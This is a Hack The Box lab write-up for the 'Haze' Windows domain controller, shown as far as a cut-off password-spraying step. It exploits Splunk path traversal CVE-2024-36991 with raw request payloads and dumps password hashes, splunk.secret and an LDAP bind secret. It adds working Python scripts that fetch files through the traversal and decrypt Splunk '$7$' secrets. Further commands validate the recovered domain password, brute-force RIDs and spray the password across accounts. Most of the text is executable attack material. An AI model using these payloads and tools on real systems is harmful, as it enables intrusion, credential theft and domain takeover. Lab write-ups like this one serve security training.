HTB Write-Up: Haze


Difficulty: Hard
OS: Windows (Active Directory Domain Controller)
Points: 30
Date: 2025-04-07


🔍 Reconnaissance

🔎 Nmap Scan Results

Command Used:

nmap -sV -sC 10.xx.xx.xx -v

Target Host: 10.xx.xx.xx (dc01.haze.htb)
Host OS: Windows Server, acting as the Active Directory Domain Controller for haze.htb

🟢 Open Ports and Services:

| Port | Service | Version / Notes |
|------|---------|-----------------|
| 53 | DNS | Simple DNS Plus |
| 88 | Kerberos-sec | Microsoft Windows Kerberos |
| 135 | MSRPC | Microsoft Windows RPC |
| 139 | NetBIOS-SSN | SMB over NetBIOS (legacy) |
| 389 | LDAP | Active Directory LDAP (Domain: haze.htb) |
| 445 | Microsoft-DS | SMB (Active Directory) |
| 464 | kpasswd5? | Kerberos password change |
| 593 | ncacn_http | RPC over HTTP |
| 636 | LDAPS | LDAP over TLS (AD) |
| 3268 | LDAP | AD Global Catalog |
| 3269 | LDAPS | AD Global Catalog over TLS |
| 8000 | HTTP | Splunk Web (login page) |
| 8088 | HTTPS | splunkd HTTP Event Collector (HEC) |
| 8089 | HTTPS | splunkd management / REST API |

🧠 Observations:

  • This host is a Windows Active Directory Domain Controller (dc01.haze.htb)

  • Multiple LDAP/Kerberos services confirm an AD environment

  • Splunk is exposed on three ports: 8000 (Splunk Web), 8088 (HTTP Event Collector) and 8089 (splunkd management/REST API)

  • Splunk version 9.2.1 was identified via the management endpoint on port 8089 (the Atom feed served at its unauthenticated root carries a version attribute); 9.2.1 is below the fixed 9.2.2 release of the CVE discussed next

🌐 Enumeration

🔹 Interface Access

  • Navigated to: http://haze.htb:8000 → Splunk Web login page
  • splunkd listeners:
    • https://haze.htb:8088 (HTTP Event Collector; accepts events with an HEC token)
    • https://haze.htb:8089 (management/REST API, the port the splunk CLI talks to)

⚠️ Vulnerability Identified

  • CVE-2024-36991 – Path Traversal in Splunk Enterprise (Windows)

    • Affects Splunk Enterprise on Windows below 9.2.2, 9.1.5 and 9.0.10; the 9.2.1 instance here is in range
    • Exploitable without authentication via the /modules/messaging/ endpoint
    • Allows arbitrary file read on the host as the user running splunkd; the traversal uses `C:../` (sent as `C%3A../`) segments, a Windows drive-relative parent reference that the endpoint's path handling does not reject, which is why the issue is Windows-only
  • 🔗 NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-36991

  • 🔗 PoC Exploit GitHub

🧪 Exploit Usage

python CVE-2024-36991.py -u http://haze.htb:8000/

[VLUN] Vulnerable: http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152


👥 Extracted Usernames (from Splunk's local user store)

The PoC's default read is `etc/passwd` under SPLUNK_HOME, i.e. Splunk's own account database rather than the Windows or domain user list. Each line holds a Splunk username, a sha512crypt (`$6$`) password hash, the account's role and an e-mail address. From that output, the following potential domain accounts were identified:

  • Edward@haze.htb
  • Mark@haze.htb
  • paul@haze.htb

🛠️ Continued Exploitation – Splunk File Reads

The `$6$` hashes are sha512crypt (hashcat mode 1800) and did not crack, so the next logical step was to point the CVE-2024-36991 read at other sensitive files under SPLUNK_HOME.
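As an added example (not the write-up's PoC and not Splunk's code), the script below builds the same `C%3A../` traversal request paths used in this write-up for any file under SPLUNK_HOME, and parses the `etc/passwd` lines the PoC returns into account records and hashcat input. The base URL and the five-segment depth are assumptions taken from the requests shown on this page; the sample passwd text is the PoC output above, embedded so the parser runs offline.

```python
"""Build CVE-2024-36991 traversal paths and parse Splunk's etc/passwd.

Added example; not the write-up's PoC. Assumes the target and traversal
depth seen in this write-up (http://haze.htb:8000, five C:../ segments).
"""
import ssl
import urllib.request

BASE_URL = "http://haze.htb:8000"  # target from the write-up (assumption)
# Five drive-relative segments climb from the messaging module directory back
# up to SPLUNK_HOME; the depth is copied from the write-up's requests.
TRAVERSAL_DEPTH = 5


def traversal_path(path_under_splunk_home, depth=TRAVERSAL_DEPTH):
    """Return the request path that reads a file relative to SPLUNK_HOME.

    Each `C:../` is sent URL-encoded as `C%3A../`: a Windows drive-relative
    parent reference that the endpoint does not reject the way it rejects `..`.
    """
    rel = path_under_splunk_home.replace("\\", "/").lstrip("/")
    return "/en-US/modules/messaging/" + "C%3A../" * depth + rel


def fetch_file(path_under_splunk_home, base_url=BASE_URL, timeout=10.0):
    """GET the file from the target (live request; not exercised offline)."""
    url = base_url.rstrip("/") + traversal_path(path_under_splunk_home)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False  # Splunk ships a self-signed certificate on 8089
    ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", errors="replace")


def parse_splunk_passwd(text):
    """Parse $SPLUNK_HOME/etc/passwd as returned by the PoC.

    Layout observed in the output on this page:
      :<user>:<sha512crypt hash>:<unused>:<full name>:<roles,...>:<email>:...
    Lines not starting with ':' (tool banners such as '[VLUN] ...') are skipped.
    """
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith(":"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue
        accounts.append({
            "user": fields[1],
            "hash": fields[2],
            "full_name": fields[4],
            "roles": fields[5].split(",") if fields[5] else [],
            "email": fields[6],
        })
    return accounts


def hashcat_lines(accounts):
    """`user:hash` lines for `hashcat -m 1800 --username` ($6$ = sha512crypt)."""
    return [f"{a['user']}:{a['hash']}" for a in accounts if a["hash"].startswith("$6$")]


# Sample input: the PoC output reproduced from this write-up, embedded so the
# parser runs offline.
SAMPLE_PASSWD = """\
[VLUN] Vulnerable: http://haze.htb:8000/
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
"""

if __name__ == "__main__":
    print(traversal_path("etc/system/local/authentication.conf"))
    for line in hashcat_lines(parse_splunk_passwd(SAMPLE_PASSWD)):
        print(line)
    # Live use against the target: print(fetch_file("etc/auth/splunk.secret"))
```

Only `traversal_path`, `parse_splunk_passwd` and `hashcat_lines` run offline; `fetch_file` issues the real request and is kept separate so the parsing can be checked without a target.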

📄 Target: Splunk Configuration File

Goal: Identify Splunkโ€™s installation path and pivot to read additional files.

Exploitation Path Used:

.../Program%20Files/Splunk/etc/splunk-launch.conf

📄 Read: splunk-launch.conf

File Content:

# Version 9.2.1
# Modify the following line to suit the location of your Splunk install.
# If unset, Splunk will use the parent of the directory containing the splunk CLI executable.

SPLUNK_HOME=C:\Program Files\Splunk

# By default, Splunk stores its indexes under SPLUNK_HOME in the var\lib\splunk subdirectory.
# This can be overridden here:
# SPLUNK_DB=C:\builds\splcore\main\build_home\splunk\var\lib\splunk

# Splunkd service name
SPLUNK_SERVER_NAME=Splunkd

PYTHONHTTPSVERIFY=0
PYTHONUTF8=1

📄 Read: authentication.conf

Request Used:

GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/system/local/authentication.conf HTTP/1.1
Host: dc01.haze.htb:8000

Response (file content):

[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
host = dc01.haze.htb
port = 389
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

Key Findings:

  • An LDAP authentication strategy is configured (the `[Haze LDAP Auth]` stanza), so Splunk logins are checked against Active Directory

  • Bind DN: CN=Paul Taylor,CN=Users,DC=haze,DC=htb, binding to dc01.haze.htb on port 389 with SSLEnabled = 0, i.e. the bind credentials travel over plaintext LDAP

  • bindDNpassword is stored in Splunk's reversible `$7$` format (AES-256-GCM with a key derived from splunk.secret), not a hash, so anyone who can read both files can recover the plaintext

📄 Read: splunk.secret

To decrypt the LDAP bind password (bindDNpassword), Splunk uses a master key stored in splunk.secret.

Request Used:

GET /en-US/modules/messaging/C%3A../C%3A../C%3A../C%3A../C%3A../etc/auth/splunk.secret HTTP/1.1
Host: dc01.haze.htb:8000

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

📌 Tool Required to Decrypt:
splunksecrets by HurricaneLabs

🔓 Decrypted LDAP Password – Paul Taylor

After retrieving both the encrypted password from authentication.conf and the splunk.secret key file, we decrypted the LDAP bind credentials for Paul Taylor.

🔐 Ciphertext (from authentication.conf)

$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=

🧰 Tool Used

  • splunksecrets: https://github.com/HurricaneLabs/splunksecrets

🧪 Command Executed

splunksecrets splunk-decrypt -S splunk.secret

The tool prompts for the ciphertext; paste the full `$7$...` string (or pass it with --ciphertext, single-quoted so the shell does not expand `$7`). The file given to -S must contain the 254-character splunk.secret exactly as read from the target.

✅ Decrypted Result

Ld@p_Auth_Sp1unk@2k24
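What splunksecrets does with these two inputs fits in a few lines. The following is an added example, not the write-up's or the splunksecrets project's code; it reimplements the `$7$` scheme as that tool implements it (PBKDF2-HMAC-SHA256 over the first 254 bytes of splunk.secret with salt `disk-encryption` and a single iteration, then AES-256-GCM with a 16-byte IV and 16-byte tag, base64-encoded behind the `$7$` prefix) and needs the `cryptography` package. The target values are the ones recovered in this write-up; `EXAMPLE_SECRET`, `flip_byte` and `is_tampered` are constructed here for the offline demonstration.

```python
"""Decrypt and re-encrypt Splunk $7$ secrets with splunk.secret.

Added example; not the write-up's or splunksecrets' code. Follows the scheme
splunksecrets implements: key = PBKDF2-HMAC-SHA256(splunk.secret[:254],
salt b"disk-encryption", 1 iteration, 32 bytes); base64 body = IV(16) ||
AES-256-GCM ciphertext || tag(16). Requires the `cryptography` package.
"""
import base64
import hashlib
import os

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Values recovered from the target in this write-up.
TARGET_SPLUNK_SECRET = (
    b"NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD"
)
TARGET_BIND_PASSWORD = "$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY="

# Constructed secret for the offline demonstration (not from the target).
EXAMPLE_SECRET = b"example-splunk-secret-constructed-for-this-demo-" * 6


def derive_key(splunk_secret):
    """Key derivation as splunksecrets does it. One PBKDF2 iteration is just
    HMAC-SHA256(secret, salt || 0x00000001): no work factor at all, so the
    secrecy of splunk.secret is the only protection the $7$ format has."""
    return hashlib.pbkdf2_hmac("sha256", splunk_secret.strip()[:254],
                               b"disk-encryption", 1, dklen=32)


def decrypt_7(splunk_secret, ciphertext):
    """Return the plaintext of a `$7$...` value. Raises InvalidTag when the
    blob was altered or a different splunk.secret is supplied."""
    if not ciphertext.startswith("$7$"):
        raise ValueError("not a $7$ secret (legacy $1$ values use an RC4-based scheme)")
    blob = base64.b64decode(ciphertext[3:])
    iv, body = blob[:16], blob[16:]  # body = ciphertext || tag, the layout AESGCM expects
    return AESGCM(derive_key(splunk_secret)).decrypt(iv, body, None).decode()


def encrypt_7(splunk_secret, plaintext, iv=b""):
    """Produce a `$7$` value in the same layout (random 16-byte IV by default)."""
    iv = iv or os.urandom(16)
    body = AESGCM(derive_key(splunk_secret)).encrypt(iv, plaintext.encode(), None)
    return "$7$" + base64.b64encode(iv + body).decode()


def payload_length(ciphertext):
    """Plaintext length in bytes, readable without the key (GCM hides content, not length)."""
    return len(base64.b64decode(ciphertext[3:])) - 32


def flip_byte(ciphertext, index=16):
    """Corrupt one byte of the blob (index 16 is the first ciphertext byte)."""
    blob = bytearray(base64.b64decode(ciphertext[3:]))
    blob[index] ^= 0x01
    return "$7$" + base64.b64encode(bytes(blob)).decode()


def is_tampered(splunk_secret, ciphertext):
    """True when the GCM tag check rejects the blob under this secret."""
    try:
        decrypt_7(splunk_secret, ciphertext)
    except InvalidTag:
        return True
    return False


if __name__ == "__main__":
    print(decrypt_7(TARGET_SPLUNK_SECRET, TARGET_BIND_PASSWORD))
```

Two things worth noticing before running it: `payload_length` on the target ciphertext gives 21, the length of the password the write-up reports, because GCM does not pad or hide length; and a wrong or truncated splunk.secret does not produce garbage, it raises `InvalidTag`, so a tag failure in splunksecrets almost always means the key file was copied incompletely.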



🎯 Initial Foothold

The bind DN names Paul Taylor; the sAMAccountName `paul.taylor` follows the first.last convention and was tested with crackmapexec against SMB on the domain controller.

Command:

crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.xx.xx.xx   445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

Confirmed: the credentials are valid for the domain user paul.taylor, so the Splunk LDAP bind account is an ordinary domain account.

After confirming access with paul.taylor, we performed RID brute-force enumeration (SAMR lookups of sequential RIDs, which need only an authenticated session) against the Domain Controller to enumerate valid users.

🧪 Command:

crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser'


500: HAZE\Administrator
501: HAZE\Guest
502: HAZE\krbtgt
1000: HAZE\DC01$
1103: HAZE\paul.taylor
1104: HAZE\mark.adams
1105: HAZE\edward.martin
1106: HAZE\alexander.green
1111: HAZE\Haze-IT-Backup$

Besides the built-in accounts, four named users appear (paul.taylor, mark.adams, edward.martin, alexander.green) plus Haze-IT-Backup$, whose trailing `$` suggests a computer or managed service account.

After identifying additional domain users via RID brute-force, we password-sprayed the recovered password across them to test for reuse. Spraying a single password is unlikely to lock accounts, but check the lockout policy first (crackmapexec smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --pass-pol).

🧪 Command:

crackmapexec smb haze.htb -u users.txt -p 'Ld@p_Auth_Sp1unk@2k24'

Note: users.txt contains:

mark.adams
edward.martin
alexander.green
Haze-IT-Backup$

✅ Successful Login: